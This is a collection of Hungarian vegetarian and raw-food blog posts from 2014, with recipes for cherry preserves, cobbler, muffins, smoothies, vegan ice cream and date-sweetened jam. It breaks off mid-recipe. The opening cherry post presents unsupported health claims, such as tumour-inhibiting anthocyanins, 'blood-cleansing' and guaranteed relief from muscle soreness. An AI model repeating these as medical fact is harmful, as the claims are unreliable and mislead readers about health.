Két meggyfánk van, rengeteg meggyünk lett. Nem a kedvenc gyümölcsöm, de azért eszegettem belőle. Sok édesség készült belőle, mint például a feketeerdő pohárkrém is, de a turmixomba is gyakran került. Egyébként a meggy kiváló gyógynövény is. Ugye van maga a gyümölcs, de a meggymag szára és maga a mag is felhasználható. Erről írtam nemrégiben, hogy akár párna is készülhet a meggymagból. Meggy gyógyhatásai Gazdag vitaminokban (A-,B-,C) és ásványi anyagokban (kálcium, kálium, magnézium, vas, cink). Mint minden bogyós gyümölcs, kiemelkedően magas a flavonoid tartalma, ezáltal antioxidáns hatásúak . Ezáltal nagyon jó hatással van a vénák falának rugalmasságára, így visszérbetegségek elkerülésére is fogyaszthatjuk. A kálcium és kálium tartalmának köszönhetően vértisztító hatású , serkenti a máj és a vese működését. A savas meggy serkentőleg hat az emésztésre és a belek mozgására . A meggy piros színét az antocianin festékanyagok okozzák, melyek köztudottan tumorgátló hatással rendelkeznek. A flavonoid egyes vegyületei gátolják az ún. ciklooxegáz enzimet, mely a gyulladásokat fenntartó prosztaglandinok folyamatos keletkezését támogatják. Az izomláz során egy pohár meggylé garantált enyhülést hoz. Ebből a sok meggyből egyrészt készítettem meggybefőttet, másrészt aszaltam is, és a fagyasztóba is került. Ez egy különleges befőtt, mert nincs benne se víz, se cukor, se tartósítószer. Csupán egy kevéske szegfűszeg, stevia levél és vanília. Elkészítése: - Először is főzzük ki az üvegeket. - A meggyet alaposan válogassuk át, mossuk meg. Én em-bios vízbe szoktamm áztatni. - Ezután 1 üvegbe fél kiló meggy fért bele. Tettem még bele a fentebb írt fűszerekből is. A stevia levél egy természetes édesítő, magát a növényt is beletehetjük, vagy annak szárított formáját. DE ne a fehér port. Az már bizonyára kezelt, egyébként mitől lenne fehér a zöld levél? - Tegyük rá a fedőt, majd állítsuk bele az üvegeket forrásba lévő vízbe. A víz egészen a kupakig érjen. Így ezt főzzük lassú tűzön kb. 25-30 percig. - Ezután húzzuk rá a tetőt, és fordítsuk fejre pár percre. - Ezután jöhet a száraz dunszt, amíg teljesen ki nem hül.A meggy ezalatt fog levet ereszteni, de főleg a száraz dunszt során. Tehát, mire elkészül elég sok lé lesz rajta. Mivel elég sok meggybefőtt lett, így eladásra is lett belőle. Tehát 100% meggy, 7 dl-es üvegben. Ár: 750Ft / üveg.
Mandulasajtos cukkíni tekercsek
2014. július 14. Gitta nyersétel blogja
Micsoda színek! Cukkini tekercsek (a zöldségek mellett látszik a krémes mandulasajt) A nyár színei, piros, sárga, zöld, fehér... Nagyon egyszerű, ki lehet próbálni, nem fogtok csalódni :) Recept: Mandulasajt: kb 10 dkg mandula 1 evőkanál sörélesztő pehely 1 gerezd fokhagyma 1 kávéskanál só víz A mandulát a megfelelő előkészítés után (beáztatjuk, lehúzzuk a héját, majd megszárítjuk, vagy eleve blansírozott mandulát használunk) késes aprítógépbe tesszük és nem túl finomra aprítjuk. Hozzátesszük a sót, fokhagymát és az élesztőt, és még keverjük egy kicsit. A gépet nem kapcsoljuk ki, hanem menet közben 1-2 evőkanál vizet teszünk hozzá, hogy már épp nedves legyen és összeálljon, de még ne legyen folyós. Kenhető, sűrű massza lesz. Cukkini tekercsek 1 közepes cukkini 1-1 sárga, zöld és piros színű paprika karalábé újhagyma (de lehet beletenni bármilyen más zöldséget, amit szeretsz, retek, uborka, avokádó, stb... ) A zöldségeket vékony, hosszú csíkokra felvágjuk. A cukkínit uborkagyalun hosszában csíkokra vágjuk, kettőt teszünk egymás mellé egy kevés átfedéssel. Egy evőkanál mandula sajtot szétterítünk az alsó részén, majd ráteszünk egy-egy szelet zöldséget, majd feltekerjük. Balzsamecetes paradicsom 8-10 szem datolya paradicsom 2 evőkanál balzsamecet 1 kis marék friss bazsalikom A paradicsomokat felvágjuk, meglocsoljuk balzsamecettel, és megszórjuk az összevágott friss bazsalikom levéllel. Együtt a cukkini tekercsekkel nagyon finom :)
Mennyei málnás rebarbarás cobbler
2014. július 14. Zizi kalandjai
Napok óta készülök kitenni ezt a receptet, de mindig közbejött valami… hol egy romantikus sorozat, a Downton Abbey negyedik szériájának befejezése, hol a 24 sorozat kilencedik szériájából zárkóztam fel , hol pedig a fáradtság. Igen, beismerem sorozatfüggő vagyok, de megválogatom, hogy mit nézek. Igazából nagyon keveset, mert nincsen TV-nk és csak online tudok az ilyenekbe bekapcsolódni, meg esténként – amikor nyugalom van – annyi mindent szeretnék csinálni, hogy a sorozat csak alkalmanként fér bele, de akkor belehúzok és néhány este alatt igyekszem utolérni magam. Tegye fel a kezét, aki nem néz sorozatokat! Kíváncsi vagyok nektek melyik a kedvencetek… megírjátok nekem kommentben?
És akkor cobbler… ismeritek ezt a sütit? Hasonló a crumble-hoz, a felépítését tekintve (alul gyümölcs, felül a tészta). Amikor I. először megkóstolta, csak ennyit mondott: “Nem tudom, hogy csináltad, de ez isteni!” :) Alulra kerülhet bármilyen gyümölcs, de én szeretek olyat használni, amelyik sütés hatására levet ereszt, így sűrű szirupos lesz a tészta alatti rész mire elkészül. A legjobbak szerintem a bogyós gyümölcsök, de jó lehet almából, körtéből és szilvából is. Lila Fügétől vettem a receptet, ő eperből készítette, én azonban málnát és rebarbarát használtam hozzá. Enyhén van édesítve, szóval teljesen érződik a gyümölcs savanykássága, ami szerintem tökéletesen passzol az édeskés, puha tésztához. Nagyon gyorsan össze lehet állítani, csak a sütési időt és a hűlést kell kivárni és a mennyei desszert már a tányérkánkban várja, hogy elfogyasszuk. Tökéletes délutáni vagy késő esti desszert egy gombóc vanília fagyival, azonban reggeliként is megállja a helyét!
Málnás rebarbarás cobbler
Hozzávalók 6-8 főre:
- 500 g málna
- 500 g rebarbara, felszeletelve
- 2 evőkanál tápióka (vagy kukorica) keményítő
- 3 evőkanál nádcukor
- 1 bio citrom reszelt héja
- 250 g simaliszt
- 100 g hideg vaj, felkockázva
- 50 g nádcukor + szóráshoz a tetejére
- 150 ml tejszín
- 1 tojás
- 1 csomag foszfátmentes sütőpor
- csipet só
Vajazzunk ki egy téglalap alakú tepsit (sütőtálat) és melegítsük elő a sütőt 170 fokra.
Egy tálban keverjük össze a málnát, a rebarbarát, a keményítőt, a 3 evőkanál nádcukrot és a citromhéjat, majd öntsük a tepsibe.
Kitchen Aid híján öntsük egy tálba a lisztet, a sót, a sütőport és kézzel morzsoljuk el benne a hideg vajat. Adjuk hozzá az 50 g nádcukrot és keverjük el. Egy kis tálkában verjük fel a tojást, öntsük hozzá a tejszínt, majd ezt a keveréket adjuk a tésztához és keverjük össze. Enyhén ragadós tésztát kell kapnunk, amit aztán evőkanállal szaggassunk a gyümölcs tetejére.
Szórjuk meg nádcukorral és süssük 170 fokon kb. 35-40 percig. Akkor jó, ha a gyümölcs szirupos és felbugyogni látjuk a tészta alól, a teteje pedig aranybarnára pirul.
Most is volt asszisztensem fotózáskor…
Mogyorókrémes-marcipános tápiókapuding
2014. július 10. Mindennapi ételeink
Hozzávalók: 10 dkg tápióka gyöngy 3 dl víz 6 dl kókusztej 10 dkg aranybarna nádcukor 1 bio citrom héja 5 dkg marcipán nádcukorral -- karobos mogyorókrém gyümölcsök Elkészítés: A tápiókát egy nagy lábasba tesszük, és felöntjük vízzel, 15 percig állni hagyjuk. Amikor felszívta a vizet, felöntjük a kókusztejjel és közepes hőfokon kavargatva megfőzzük, amíg a gyöngyök puhák, áttetszőek lesznek. Ekkor adjuk hozzá a cukrot, citromhéjat és az apró kockákra vágott marcipánt. Összekeverjük. Rétegezzük mogyorókrémmel és gyümölcsökkel, behűtve tálaljuk. TIPP: a marcipán kihagyható.
Nutellás barackos muffin
Ez a muffin egy ismerősöm receptje alapján készült. Igaz, hogy az körtés volt, és búzaliszttel készült, és csoki sem volt benne. Ez már csak így van. Találok egy receptet, és mire elkészítem, egészen más lesz belőle. De gondolatindítónak kiváló. Az elkészítése során volt egy kis malőr, mert én csokiforgácsot akartam beletenni, amit szépen bele is reszeltem. Csak a forró tejbe! Úgyhogy az szépen elolvadt, így lett belőle a nutella. Na de nem baj, így is finom lett. De legközelebb tényleg csokiforgács kerül bele. Hozzávalók: - 10 dkg teljes kiőrlésű tönköly liszt - 10 dkg zabliszt - 5 dkg mogyoróliszt - 1 tesákanál szódabikarbóna - 1 kávéskanál fahéj - 1 késhegynyi őrölt szegfűszeg - 4 dkg pirított, durvára vágott mogyoró - 4 dkg csokoládé forgács - 2 dl növényi tej - 5 dkg olvasztott vaj/kókuszolaj - 2 evőkanál méz - 20 dkg sárgabarack kis kockára vágva Ugyen, mint minden muffin készítésénél van száraz és nedves hozzávaló. Ezeket külön összekeverjük, majd egybe is összedolgozzuk. Figyeljünk arra, hogy ne keverjük túl. Előmelegített sütőben, 160-180 fokon 30-40 perc alatt készre sütöm.
Meggyfagyi
2014. július 5. Gitta nyersétel blogja
Egy kis laza nyári édesség... éppen ránk fér. Ha szereted a savanykás ízt, akkor ezt próbáld ki. Bár ha több mézet teszel bele, akkor ez is tud édes lenni :) Javában meggyszezon van, ráadásul itt terem a kertben :) Meggyfagyi: 2-3 marék meggy 4 evőkanál őrölt mandula (amitől krémesebb lesz) 1 evőkanál chia mag (ez jól összetartja) pici méz 1 evőkanál méz + 1 kávéskanál kakaópor mandula forgács A meggyet simára turmixoljuk egy kevés mézzel, majd kikeverjük az őrölt mandulával, és a chia magot is hozzáadjuk. Fagyasztóba tesszük dermedni. Tálaláskor mézzel elkevert kakaóport csurgatunk rá, és megszórjuk mandula forgáccsal.
Lasagna hajó
2014. július 2. Gitta nyersétel blogja
Fő a változatosság! Adott a nyers lasagna receptje.Itt vagy itt Cukkíni szeletek és kétféle (paradicsomos és magos-pesztós) szósz. Ha meguntuk a hagyományos "egymás tetejére rakás"-t, jöhetnek a különböző ötletek. Kreatív munkatársaink alkotása a lasagna összetevőiből Vitorlás.... aszalt édesburgonya chipsz díszítéssel, vendég mángold vitorlával
Vegán őszibarackos pite
2014. július 1. Zizi kalandjai
Nem is meséltem milyen izgalmakkal indult a londoni utazás… szóval állunk sorba az átvilágításhoz a reptéren Budapesten (kedvesek voltak, előre engedtek minket egy rövid sorba, mivel babával voltunk), persze Ádi elaludt a babakocsiban. Nincs mese, fel kell ébreszteni a gyereket. Megvolt. Aztán kipakolni aprópénzt, laptopot, övet, baba ételt és italt, egyéb folyadékot… szinte mindent ki kellett pakolnunk a szalagra. Igyekeztem Ádira figyelni, mert nemrég ébredt, amikor I. szólt, hogy mintha Jude Law hangját hallaná a mellettünk levő sorban (imádom csak a hangját hallgatni is). Mire odanéztünk már csak háttal láttuk elmenni mellettünk, de hátulról elég Jude Law formájú volt. Szóltam I.-nek, hogy siessen a pakolással, nem hagyhatom az egyik kedvenc férfi színészemet meglógni. Táskával a vállamon, Ádival a karjaimban rohanok Jude után és már előre örülök – mit örülök, sikítozok magamban -, hogy együtt, egy repülőgépen utazunk Anglia egyik sármőrjével. Utol is értük, amikor Jude éppen az utolsó forintjait váltotta vissza fontra, majd a fiával és a kísérőjével – aki egyébként egy nagy il Bacio di Stile bevásárló táskát cipelt neki – sétáltak tovább előttünk. Senki nem volt a közelünkben és bénán tébláboltunk, hogy odamenjünk hozzá egy közös fotót kérni vagy sem. Nyuszik voltunk, betojtunk és nem mertünk odamenni… Jude-ot fel is kísérték a VIP váróba, szóval rájöttünk, hogy nem is velünk fog utazni Londonba Easyjet-tel, hanem az utána induló British Airways-zel, nyilván business osztályon. Konstatáltam, életem nagy lehetőségét halasztottam el… mikor fogok én legközelebb Jude Law-val néhány szót váltani, esetleg egy közös fényképet készíteni? Na, el is határoztam, hogy többet nem leszek ilyen nyuszi, így a konferencián meg is ragadtam az alkalmat, nem tébláboltam és odamentem Yotam Ottolenghi-hez, meg Donal Skehan-hoz is, hogy közös fotót készítsek velük!
A sztár kalandok után jöjjön a recept. Magdi vegán blogját követem már egy ideje, rengeteg receptet oszt meg, hihetetlen termékeny, holott neki is van egy Ádinál néhány hónappal fiatalabb kisbabája, Fanni. Ettől függetlenül süt, főz a konyhában és posztolja is azt a rengeteg receptet. Néhány hónapja derült ki számomra, hogy készített egy vegetáriánus gyerekeknek szóló szakácskönyvet, “A főzés gyerekjáték!” címmel.
Kaptam belőle egy példányt és örömmel vetettem bele magam az átlapozásába. A különböző fejezetek (Jó reggelt!, Levesek családi ünnepekre, Zöldségparádé a hétköznapokra, Saláták a mindennapokra, Édes élet télen-nyáron, stb.) receptjei tippekkel, ötletekkel vannak színesítve. Minden receptet egy szépen, jól komponált kép tesz még érdekesebbé, a nyelvezete is könnyű, egyszerűen vannak leírva. Nem tudok róla, hogy lenne hasonló vegetáriánus gyerek szakácskönyv a piacon, szóval Magdi hiánypótlót alkotott (egyelőre). Felnőttek is süthetnek, főzhetnek a könyvből, de úgy gondolom, hogy 6-7 éves kortól lehet érdekes a könyv gyerekek számára. A 85 receptből álló szakácskönyvet ezen a linken tudjátok megrendelni.
Vegán őszibarackos pite
Hozzávalók:
- 1/2 bögre teljeskiörlésű tönkölyliszt
- 1/2 bögre finomliszt
- 1/2 bögre nádcukor
- 1/2 bögre rizstej
- 1/4 bögre napraforgó olaj
- 1 nagy alma, meghámozva, kimagozva, lereszelve (én babareszelőt használtam, hogy pürés legyen az állaga)
- 1 zacskó foszfátmentes sütőpor
- 2 csipet só
- 7-8 db őszibarack, félbe vágva, kimagozva
(A recepthez használt bögre 250 ml-es.)
Melegítsük elő a sütőt 170 fokra.
Egy tálban a liszteket keverjük össze a sütőporral és a sóval. Egy másik tálban keverjük össze az almapürét az olajjal és a nádcukorral. Keverjük hozzá a rizstejet, majd a nedves hozzávalókat fokozatosan keverjük a szárazhoz, amíg sima tésztát kapunk.
A tésztát öntsük kiolajozott, belisztezett pite- vagy tortaformába (kb. 23 cm átmérőjű). Forgassuk lisztbe a félbevágott őszibarackokat és tegyük a pite tetejére (én nem kaptam magvaváló őszibarikat, ezért macerás volt a félbe vágásuk, így nem raktam túl sokat a tetejére, de ti jól pakoljátok meg a pitéteket barackokkal). 170 fokon süssük kb. 30 percig (szúrjunk bele egy fogpiszkálót és ha már nem ragad rá tészta, valamint aranybarna a teteje, akkor jó).
Nyers étel házhozszállítás - nyers ebéd
2014. június 29. Gitta nyersétel blogja
Itt a blogon sok bejegyzés van, és amióta vezetem, már többféle formában is történt nyers étel házhozszállítás. Ezeket a korábbi bejegyzéseket úgy kell tekinteni, mint a történelmet... mindig meg kell nézni a bejegyzés dátumát... :) A legfrissebb információ (legalábbis itt a blogon) szerint a Nyersétel Akadémia csodás nyers ételeit az Egészségkonyha kiváló futárai szállítják házhoz. Megrendelni is náluk lehet itt: www.egeszsegkonyha.hu oldalon EGÉSZSÉGKONYHA 10-féle étel közül lehet választani, kétféle ital, kétféle leves, háromféle főétel, kétféle édesség és egy aszalvány található a menüben, Z1-Z10-ig szép kék háttérben. (kicsit lejjebb kell görgetni a képernyőn az étlapot, és ott vagyunk lent, ki is van írva, hogy Nyersétel Akadémia Ételeink kizárólag növényi, feldolgozatlan alapanyagokból állnak, és nem tartalmaznak glutént, szóját, hozzáadott cukrot. Édesítésnek főleg datolyát, ritkán mézet használunk, sózásra pedig Himaláya sót. A felhasznált víz tisztított, szűrt! Ha kíváncsi vagy arra, hogy pontosan mit is tartalmaznak ételeink, azt is megnézheted, mert az összetevőket is feltüntettük az étlapon. Rendelni is itt tudsz, nézd meg a főoldalon a Szállítási helyek között szerepel-e a városod, településed, és ha igen, akkor regisztrálás után már rendelhetsz is! Nyers zöldségfasírt A Nyersétel Akadémia oldalán mindig fent van az AKTUÁLIS HETI ÉTLAP fotókkal illusztrálva! Ha még csak ismerkedsz a nyers ételekkel, akkor érdemes ránézni erre az oldalra, hátha kedvet kapsz egy kóstolóra (a fotók alapján) Próbáld ki, ha egy ételre rákattintasz, megjelenik nagyobban! Így jobban láthatod a képet is! Itt nem tudsz rendelni, de szét lehet nézni, és ha megtetszik valamelyik étel, az Egészségkonyha oldalán meg tudod rendelni! Brownie Ételeink reggel már a futár hűtőkocsijában vannak, hogy a délelőtt folyamán elszállítsa hozzád. Ezt mi az előző nap folyamán készítjük el, és hűtjük le 5 Celsius fokra. Ezen a hőmérsékleten történik a tárolás, szállítás, hogy hozzád frissen érkezzen, és minél több értékes anyagot megőrizzünk. Neked viszont nem kell ilyen hidegen fogyasztanod, a legjobb, ha 1 órát hagyod szobahőmérsékleten felmelegedni. Mikrót lehetőleg ne használj! A dobozok nagyon jó hőszigetelők, ezért ha már tudod, hogy mikor eszed, tedd ki tányérba, és úgy hagyd kint (most a napon, de télen mehet egy 10 percre a meleg radiátorra) Összeszokott csapat dolgozik azon, hogy ételeink ne csak egészségesek, hanem ízesek is legyenek. Sokan írnak nekem levelet: "Gitta, megkóstoltam az ételeiteket, és meglepően finomak..." Nagyon sok mindenre kell figyelni: alapanyagok, mennyiségek, fűszerek, állag, változatosság... és aki nem erre számít, annak valóban meglepő, hogy kizárólag növényi alapanyagokból milyen íz-bombákat lehet összeállítani! Ha bizonytalan vagy, kérdésed van, ne habozz! Kérdezz bátran, itt vagyok!
Kapros uborkaleves
2014. június 28. Gitta nyersétel blogja
Kinek van kedve ilyen melegben főzni? Inkább jól esne egy frissítő, nyers leves, ugye? Ez a kapros uborkaleves ilyen. Frissítő, könnyű, és természetesen lúgosító, feltölt ásványi anyagokkal, ízekkel! Hozzávalók: 1 kígyóuborka kinyert leve (vagy használhatod a teljes uborkát, ez akkor egy tartalmasabb leves lesz) 0,5 liter mandulatej (saját készítésű, recept itt: mandulatej. Arra figyelj, hogy ha a mandulatejet nyers leveshez használod, akkor ne tegyél bele fahéjat, édesítőket) 1 teáskanál citromlé 1 csipet só, kapor kapor, pirospaprika a díszítéshez A kígyóuborkát lenyomjuk a gyümölcscentrifuga "torkán", és kinyerjük a levét. (Ha egy sűrűbb állagú levest szeretnél, akkor felhasználhatod az egész uborkát) Turmixgépbe tesszük az uborka levét (vagy az egész uborkát kockára vágva), a mandulatejet, a sót, egy kevés kaprot és a citromlét. Simára keverjük. Kitöltjük kis tányérokba, apróra vágott kapor levelekkel és pirospaprikával tálaljuk. Kockára vágott uborkát lehet beletenni, hogy legyen a levesben "rágnivaló" is :)
Köles szelet ribizli kalappal
Maradt még tegnapról borsólevesem, csak egy falatnyi pikáns édességet csináltam hozzá percek alatt ;) Hozzávalók az alaphoz: 1 csészényi köles 2 csészényi víz csipet tiszta só 1 kk vanília 1 ek agavé szirup A kölest alaposan megmossuk, majd a sóval és vízzel puhára főzzük. Lefedve állni hagyjuk, hogy felszívja a maradék vizet. Közben elkészítjük a […]
Mandulatejes meggyturmix
2014. június 24. Gitta nyersétel blogja
Újraéled a blogom! Hamupipőke álmából sikerült felébreszteni, remélem most már így is marad, és folytatni tudom a szép és egészséges receptek töltögetését és megosztását. Ez a meggyes turmix akkor született, amikor hirtelen sok sok meggy lett itthon, hála tündér gyerekeimnek, akik nagy lelkesen elkezdték leszüretelni a meggyet a kertünkben lévő fáról. "Anya nézd, négyes csokor" közelrőlA meggy (természetesen kimagozva) bekerült a turmixgépbe, egy liter mandulatej, és egy marék kesudió társaságában. Mivel így nagyon savanyú lett, édesítőnek mézet és stéviát tettem még hozzá. Habos és nagyon finom lett... meggyes turmix Jöhet a következő adag?
Csokis-meggy smoothie
2014. június 21. Éltető ételek
Szerintem remek párosítás az édes és a savanyú. Emellé még egy kicsit keserű is, na az aztán az ízorgia. Itt pont ezek érvényesülnek. Most itt a meggyszezon, ne hagyjuk ki ezt a receptet! A banán szerintem elég édes, nincs szükség külön édesítésre. Hozzávalók (1 adag) - 1 banán - 1 marék magozott meggy - kb. 1 dl víz - 1 evőkanál kakaópor - 1 késhegynyi vaníliapor Elkészítés: - Tegyünk turmixba mindent, a meggy kivételével. Azt csak a végén tegyük hozzá, hogy még egy csöppet darabos maradjon. Ennyi... Uzsonnára a gyerekek is imádni fogják...
Kókuszos-meggyes muffin csokireszelékkel
2014. június 19. Éltető ételek
A muffin az egy olyan édesség, ami jöhet bármikor. A nagylányom már önállóan is meg tudja sütni ezeket, csak egy baj van vele... nem szeret elmosogatni utána. Mondtam is neki, csak akkor süthetsz, ha utána nem marad mosatlan. Azért így is neki szokott állni. Hozzávalók: Száraz összetevők: - 25 dkg liszt (zabliszt és teljes kiőrlésű fele-fele arányban) - 2 teáskanál szódabikarbóna - 10 dkg kókuszreszelék - kb. 5 dkg csokireszelék - késhegynyi vanília - csipet só Nedves összetevők: - 12 dkg méz (kókuszvirágcukor) - 12 dkg kókuszolaj/vaj - 15 dkg magozott meggy - 2 dl kókuszkrém - 1 evőkanál őrölt arany lenmag 2 evőkanál vízzel elkeverve (a tojást helyettesíti) Elkészítés: - A száraz hozzávalókat keverjük össze, majd külön a nedveset is. Laza mozdulatokkal dolgozzuk össze a kettőt. - A kókuszkrém dobozában van két kis csomag kókuszkrém. Az egyikre van szükség. Tegyük egy pohárba, majd öntsük fel annyi vízzel, hogy 2 dl legyen belőle. - A sütőt melegítsük elő 190 fokra, majd a 12 db-os muffin formába osszuk szét a masszát. Jó tele lesz, de nem baj. - Süssük kb. 25 percig. Fogyasztás előtt hagyjuk teljesen kihűlni, mert egy kicsit porhanyós még melegen. De nagyon finom ám!!Jó étvágyat!
Vegán 5 perces krémes eper fagylalt
2014. június 18. Zizi kalandjai
Végre fagylalt szezon! Tavaly nyáron elmaradt a jégkrém, fagyi készítés, mert az aprócska mélyhűtő fakkunk anyatejes zacskókkal volt tele. Na, de majd most nyáron! Tervbe is van véve néhány cukormentes vegán jégkrém készítése, hogy Ádival is megismertessük a hűsítő csodát. A leginkább baba barát fagylalt ez az egyszerű vegán cukormentes banános változat. Egyszerű, gyorsan elkészül és egyetlen egy alapanyag kell hozzá, banán!
A mini mélyhűtő fakknak köszönhetően fagylalt készítő gépünk sincs sajnos – nem férne be -, tehát nálam többnyire a jégkrémek jöhetnek szóba, ha hűsítő desszertre vágyunk. Vagy az olyan fagylaltok, amelyek elkészítésük pillanatában már krémesek és azonnal tálalhatók, fogyaszthatók. Ilyen a fentebb említett banános változat és ez az epres is.
A titka, hogy fagyasztott eperből készül, a krémességet pedig a joghurt adja. Készülhet valódi joghurtból, azonban én szójajoghurtot használtam, így vegán változatban készült el. Nagyon kevés juharszirupot adtam hozzá édesítésnek, de olyan kevésnek bizonyult, hogy egyáltalán nem édesítette meg, szóval mindenki ízlésének megfelelően édesítse. Először úgy terveztem, hogy veszek friss epret, lefagyasztom és abból készítem, de aztán az egyszerűség kedvéért úgy döntöttem, hogy veszek inkább fagyasztott epret. Tényleg öt perc alatt elkészül!
Vegán 5 perces krémes eper fagylalt
(Recept: Just A Taste)
Hozzávalók:
- 4 bögre (kb. 500 g) fagyasztott eper
- 1/2 bögre szójajoghurt
- 3 evőkanál juharszirup vagy méz (ha édesebbre szeretnénk, tegyünk bele többet)
- 1 bio citrom reszelt héja
- 1 evőkanál frissen facsart citromlé
(A recepthez használt bögre 250 ml-es.)
Tegyük az összes hozzávalót a robotgépbe és pürésítsük simára, krémesre kb. 5 perc alatt.
Tálaljuk azonnal vagy tegyük dobozba és be a mélyhűtőbe. Mi néhány órával később elővettük újra és még mindig krémes volt az állaga.
Ne felejtsétek el a nyereményjátékot! Szerda éjfélig játszhattok a gourmet csomagért. Szeretném mindenkinek megköszönni a kommentet, mert ez egy szuper gyűjtőhelye lett a “Londonban feltétlen meg kell nézni” helyeknek. Bárcsak holnap indulnék újra és végigjárhatnám azokat a helyeket, amelyeket ti írtatok meg és számomra is újdonságként hatottak. Szóval, aki Londonba készülődik, ne felejtse átfutni a listát!
Gyümölcsmártás főzés nélkül
Finom, gyorsan elkészíthető nyári ebéd
gyümölcsökből egyszerűen.
Hozzávalók:
meggy, vegyes gyümölcs (pl. őszibarack, sárgabarack, szilva – én ezeket használtam, növényi tej (pl. rizstej), édesítő (pl. agavé szirup vagy méz), kesutejszínhez: kesudió, víz
Elkészítés:
A meggy nagy részét és egy kis vegyes gyümölcsöt összeturmixolunk rizstejjel, vagy más növényi tejjel. Kesutejszínnel krémesítjük (kesudió, víz, méz – tejfölsűrűségű masszává turmixolva), majd édesítjük ízlés szerint mézzel vagy agavé sziruppal, esetleg más édesítővel.
Ha elkészült gyümölcsdarabokat szórunk bele.
Daraként köleslisztet adtam hozzá.
Jó étvágyat!
Eperlekvár datolyával édesítve
Tavalyi kreálásom eredménye ez az eperlekvár, amiből talán még 2 kicsiny üvegecskével őrzök, hátha idén nem jön össze a saját eperlekvár befőzés. (A napokban magas lázam volt, tartok tőle, mire teljesen felépülök, már nem lesz befőző eper.) Múlt évben nem tudtam időben közölni eme remeket, így pótolom mulasztásom sokak örömére. Jó hír, hogy datolyát alkalmazva nem kellett cukrot hozzáadnom. Öröm volt télen rájárnom erre a sikertermékemre. :)
A recept:
Hozzávalók:
- kb. 4 -5 kg eper
- 30 dkg datolya (vagy több, ha édesszájúbbaknak készül)
- üvegek
- befőzési fólia
+ fahéj (Az utolsó néhány üvegbe kitöltés előtt kevertem hozzá a lekvárhoz, így lett pár fahéjas-datolyás eperlekvár is.)
Elkészítés:
Mint minden befőzés, úgy ez is két nélkülözhetetlen alappal indul.
- A gyümölcsök alapos átmosása (többszöri vízben, az én epreim háromszor is megfürödtek jó hideg vízben), és természetesen az esetleges rossz szemek kiválogatása
- Az üvegecskék előkészítése. A következő hadművelettel érdemes ezt végezni:
Keressünk néhány elfekvőben lévő lehetőleg csinosabb üveget. Győződjünk meg arról, hogy a kupakok épek és rozsda, karcmentesek. Mossuk el őket, ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy nagyobb tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. félig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni kezd. Amikor már felforrt a víz mindegyik üvegben, kivehetjük a sütőből. Fontos, hogy ezt vízforralós tevékenységet már akkor csináljuk, amikor szinte kész a lekvárunk. Ugyanis a felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a lekvárokat.
A lekvár elkészítése:
Miután alaposan átmostuk az eperszemeket, odatesszük főzni és közben krumplinyomóval kicsit áttörjük a gyümölcsöt, vagy botturmixot is használhatunk erre a célra. Míg az eper melegedik, a datolyákat előkészítjük. A datolyaszemeket (mag nélkül) meleg vízben kicsit átmossuk, majd felaprítjuk őket. Ízlésünknek megfelelően édesíthetjük vele a lekvárt. Nekem a több kg eperhez mindössze 30 dkg datolya elég volt. A felaprított datolyákat hozzákeverjük a lekvárhoz.
Mivel én zselésítő anyag nélkül szerettem volna készíteni, így arra az elhatározásra jutottam, hogy az eper levét leszűrtem. Így egy tömörebb anyagú lekvárt kaptam.
Végül a leszűrés után a felforralt üvegekből még szinte forró állapotukban kiöntjük a vizet és a helyére az elkészült eperlekvárt öntjük. A megtöltött üvegek tetejére fóliát teszünk. A fedőt alaposan rácsavarjuk majd előkészített meleg helyre fejjel lefelé állítjuk.
A meleg hely jelen esetben nyári takaró és törölköző párost jelentette egy tiszta lavorban. De máskor már rekeszbe is tettem, doboz sem megvetendő. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lekvár a tűzön rotyog. Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 24 óra kell nekik. Szóval ellenőrizni ráér másnap. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni.
Természetesen maradt ki még egy kevés, ami nem került üvegbe. Gyorsan el is fogyott. Lekvárfőzésnél megeshet, hogy nem tudjuk az egészet üvegbe tölteni. Tiszta edénybe rakva (akár üveg) a hűtőben egy darabig megőrzi minőségét. Bár szerintem előbb elfogy, mint megromlana.
Faeper és édeskömény saláta
2014. június 11. Govinda Vegetáriánus konyhája
Ki mondta azt neked, hogy keményen kell dolgoznod csak azért, hogy finomságokat egyél? Íme a mai finomság - faeper - földieper - édeskömény levele Le kell szedned - meg kell mosnod - fel kell aprítanod - össze keverned - Istennek hálát adnod - boldogan megenned.
Aszalt gyümölcsös bonbon
Szinte ez is nyers édesség, ajándék, leszámítva azt, hogy a máz nem nyersen lett összekeverve. Ha csak lehet, olyan aszalt gyümölcsöt használjunk, amit mi aszaltunk. Tavaly rengeteg apró szemű bio almát szedtem egy Tolna megyében élő rokonom fájáról. Emellett szilvát, nektarint, körtét és más gyümölcsöket is aszaltam. Főként ezek szolgáltak alapanyagul. Lehet, hogy kalóriabomba, de nagy előnye, hogy nem bírsz sokat enni belőle, másrészt pedig rostban gazdag táplálék, ami miatt inkább ajánlom ezt enni, ha édességre vágyunk, mint valami ipari úton készült bonbont. Gasztroajándéknak is nagyszerű! Én örülnék neki. :)
Hozzávalók:
- 1 bögrényi vegyes aszalt gyümölcs (alma, szilva, barack stb.)
- 2 alma
- 1/3 bögrényi őrölt lenmag
- 1/3 bögrényi kókuszreszelék
- 1/2 bögrényi darált dió
- reszelt (megmosott, ha lehet bio) narancshéj
- víz
Csokimáz:
- 2 evőkanál karobpor vagy kakaópor
- 2 evőkanál édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb - vagy áztatott, majd szétpréselt datolya)
- 2 evőkanál kókusz zsír
- 3-4 evőkanál növényi tej
Elkészítés:
